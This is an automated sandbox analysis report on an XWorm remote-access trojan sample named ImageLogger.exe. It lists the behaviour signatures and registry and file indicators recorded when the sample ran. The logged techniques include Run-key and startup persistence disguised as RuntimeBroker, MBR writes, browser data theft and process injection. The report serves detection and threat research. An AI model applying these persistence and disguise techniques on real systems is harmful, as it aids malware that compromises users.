Malware Analysis Report

2024-11-16 13:30

Sample ID: 240621-vavw7ssbjp
Target: ImageLogger.exe
SHA256: 5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba
Tags: xworm bootkit execution persistence ransomware rat spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba

Threat Level: Known bad

The file ImageLogger.exe was found to be: Known bad.

Malicious Activity Summary

Tags: xworm bootkit execution persistence ransomware rat spyware stealer trojan

Contains code to disable Windows Defender

Xworm

Detect Xworm Payload

Xworm family

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Drops startup file

Loads dropped DLL

Writes to the Master Boot Record (MBR)

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Drops desktop.ini file(s)

Enumerates connected drives

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Uses Volume Shadow Copy service COM API

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Modifies registry class

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-21 16:47

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-21 16:47

Reported: 2024-06-21 17:11

Platform: win10v2004-20240611-en

Max time kernel: 749s

Max time network: 760s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\MEMZ.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\MEMZ.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe" C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2080292272-204036150-2159171770-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\U: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\M: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\N: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\S: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\T: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\V: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\R: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\J: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Downloads\MEMZ.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1424 set thread context of 1120 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\dotnet\host\fxr\6.0.27\hostfxr.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI239F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI23EF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3238.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3277.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000000000000187f58750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634628102897978" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\497A7447E2AFEB24ABA9F5BC5DC4D53F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0" C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A1A5B816FCD50AC5256C8FA1FB47CF92 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Windows\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
